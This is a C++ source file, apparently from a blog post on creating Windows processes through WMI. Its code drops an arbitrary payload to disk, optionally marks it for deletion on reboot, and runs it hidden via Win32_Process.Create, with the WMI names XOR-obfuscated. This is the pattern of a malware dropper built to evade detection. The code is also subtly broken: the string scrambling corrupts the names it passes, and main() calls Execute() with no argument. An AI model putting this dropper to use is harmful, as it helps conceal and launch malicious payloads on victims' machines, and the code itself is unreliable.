// WMICreateProcess.cpp : 定义控制台应用程序的入口点。
//
#define _WIN32_DCOM
#include <iostream>
using namespace std;
#include <comdef.h>
#include <Wbemidl.h>
# pragma comment(lib, "wbemuuid.lib")
typedef struct _EXECUTE_ACTION //action type = 1
{
LPBYTE lpbPayload;
DWORD dwPayloadLen;
WCHAR *wcTargetPath;
BOOL bDeleteOnReboot;
INT iRunPayloadAs;
} EXECUTE_ACTION, *PEXECUTE_ACTION;
BOOL ExpandStrings(WCHAR *wcInString, WCHAR *&wcOutString)
{
wcOutString = NULL;
DWORD dwSizeNeeded = ExpandEnvironmentStrings(wcInString, NULL, 0);
wcOutString = (WCHAR *)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (dwSizeNeeded + 2) * sizeof(WCHAR));
ExpandEnvironmentStrings(wcInString, wcOutString, dwSizeNeeded);
return TRUE;
}
BOOL Execute(PEXECUTE_ACTION peaExecute)
{
if (peaExecute == NULL) return FALSE;
if (peaExecute->dwPayloadLen == 0
|| peaExecute->wcTargetPath == NULL
|| peaExecute->lpbPayload == NULL)
{
return FALSE;
}
BOOL bSuccess = FALSE;
WCHAR *wcExpandedPath = NULL;
ExpandStrings(peaExecute->wcTargetPath, wcExpandedPath);
if (wcExpandedPath == NULL) {
return FALSE;
}
HANDLE hFile = CreateFile(wcExpandedPath,
GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
WCHAR *wcCommandExecute = (WCHAR *)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,
(wcslen(wcExpandedPath) + 10) * sizeof(WCHAR));
wsprintf(wcCommandExecute, L"\"%s\"", wcExpandedPath);
if (hFile == INVALID_HANDLE_VALUE) {
goto ret;
}
DWORD dwRWBytes = 0;
WriteFile(hFile, peaExecute->lpbPayload, peaExecute->dwPayloadLen, &dwRWBytes, NULL);
CloseHandle(hFile);
if (peaExecute->bDeleteOnReboot)
{
WCHAR *wcCommandDelete = (WCHAR *)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, (wcslen(wcExpandedPath) + 10) * sizeof(WCHAR));
wsprintf(wcCommandDelete, L"\\\\?\\%s", wcExpandedPath);
MoveFileEx(wcCommandDelete, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
HeapFree(GetProcessHeap(), 0, wcCommandDelete);
}
if (wcExpandedPath != NULL) HeapFree(GetProcessHeap(), 0, wcExpandedPath);
wcExpandedPath = NULL;
//finished writing - create process
HRESULT hr;
hr = CoInitializeEx(0, COINIT_MULTITHREADED);
if (FAILED(hr)) goto ret;
IWbemLocator *pLoc = NULL;
hr = CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER,
IID_IWbemLocator, (LPVOID *)&pLoc);
if (FAILED(hr)) goto uninit;
IWbemServices *pSvc = NULL;
hr = pLoc->ConnectServer(_bstr_t(L"ROOT\\CIMV2"), NULL, NULL, 0, NULL, 0, 0, &pSvc);
if (FAILED(hr)) goto relloc;
hr = CoSetProxyBlanket(pSvc, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL,
RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE);
if (FAILED(hr)) goto relsvc;
WCHAR wcMethodName[] = L"Create";
for (int i = 5; i > 0; i--){
wcMethodName[i] = wcMethodName[i - 1] ^ wcMethodName[i];
}
wcMethodName[0] = wcMethodName[0] ^ 0x76A2;
WCHAR wcClassName[] = L"Win32_Process";
for (int i = 12; i > 0; i--) {
wcClassName[i] = wcClassName[i - 1] ^ wcClassName[i];
}
wcClassName[0] = wcClassName[0] ^ 0x3491;
WCHAR wcStartup[] = L"Win32_ProcessStartup";
for (int i = 19; i > 0; i--) {
wcStartup[i] = wcStartup[i - 1] ^ wcStartup[i];
}
wcStartup[0] = wcStartup[0] ^ 0x759A;
IWbemClassObject *pClass = NULL;
hr = pSvc->GetObjectW(wcClassName, 0, NULL, &pClass, NULL);
if (FAILED(hr)) goto relsvc;
IWbemClassObject* pStartupObject = NULL;
hr = pSvc->GetObject(wcStartup, 0, NULL, &pStartupObject, NULL);
if (FAILED(hr)) goto relclass;
IWbemClassObject* pStartupInstance = NULL;
hr = pStartupObject->SpawnInstance(0, &pStartupInstance);
if (FAILED(hr)) goto relobject;
//Create the values for the in parameters
VARIANT varParams;
VariantInit(&varParams);
varParams.vt = VT_I2;
varParams.intVal = SW_HIDE;
//Store the value for the in parameters
WCHAR wcShowWindow[] = L"ShowWindow";
for (int i = 9; i > 0; i--) {
wcShowWindow[i] = wcShowWindow[i - 1] ^ wcShowWindow[i];
}
wcShowWindow[0] = wcShowWindow[0] ^ 0x756E;
hr = pStartupInstance->Put(wcShowWindow, 0, &varParams, 0);
IWbemClassObject* pInParamsDefinition = NULL;
hr = pClass->GetMethod(wcMethodName, 0, &pInParamsDefinition, NULL);
if (FAILED(hr)) goto relStartupInstance;
IWbemClassObject* pParamsInstance = NULL;
hr = pInParamsDefinition->SpawnInstance(0, &pParamsInstance);
if (FAILED(hr)) goto relParamDef;
//Construct Command
VariantClear(&varParams);
VARIANT varCommand;
VariantInit(&varCommand);
varCommand.vt = VT_BSTR;
varCommand.bstrVal = wcCommandExecute;
WCHAR wcCommandLine[] = L"CommandLine";
for (int i = 10; i > 0; i--) {
wcCommandLine[i] = wcCommandLine[i - 1] ^ wcCommandLine[i];
}
wcCommandLine[0] = wcCommandLine[0] ^ 0x52DA;
//Store the value for the in parameters
hr = pParamsInstance->Put(wcCommandLine, 0, &varCommand, 0);
varCommand.vt = VT_BSTR;
varCommand.bstrVal = NULL;
WCHAR wcCurrentDirectory[] = L"CurrentDirectory";
//Store the value for the in parameters
hr = pParamsInstance->Put(wcCurrentDirectory, 0, &varCommand, 0);
//Store the value for the in parameters
VARIANT vtDispatch;
VariantInit(&vtDispatch);
vtDispatch.vt = VT_DISPATCH;
vtDispatch.byref = pStartupInstance;
WCHAR wcProcessStartupInfo[] = L"ProcessStartupInformation";
for (int i = 24; i > 0; i--) {
wcProcessStartupInfo[i] = wcProcessStartupInfo[i - 1] ^ wcProcessStartupInfo[i]; wcProcessStartupInfo[0] = wcProcessStartupInfo[0] ^ 0x3D6A;
}
hr = pParamsInstance->Put(wcProcessStartupInfo, 0, &vtDispatch, 0);
//Execute Method
IWbemClassObject* pOutParams = NULL;
hr = pSvc->ExecMethod(wcClassName, wcMethodName, 0, NULL, pParamsInstance, &pOutParams, NULL);
if (FAILED(hr)) goto relParamInst;
bSuccess = TRUE;
pOutParams->Release();
relParamInst:
pParamsInstance->Release();
relParamDef:
pInParamsDefinition->Release();
relStartupInstance:
pStartupInstance->Release();
relobject:
pStartupObject->Release();
relclass:
pClass->Release();
relsvc:
pSvc->Release();
relloc:
pLoc->Release();
uninit:
CoUninitialize();
ret:
if (wcExpandedPath != NULL) HeapFree(GetProcessHeap(), 0, wcExpandedPath);
if (wcCommandExecute != NULL) HeapFree(GetProcessHeap(), 0, wcCommandExecute);
return bSuccess;
}
int main()
{
_EXECUTE_ACTION ac;
Execute();
}
梦回起点
做你害怕做的事,你会发现:不过如此
Windows下C++使用WMI接口创建进程
2022-04-27
暂无评论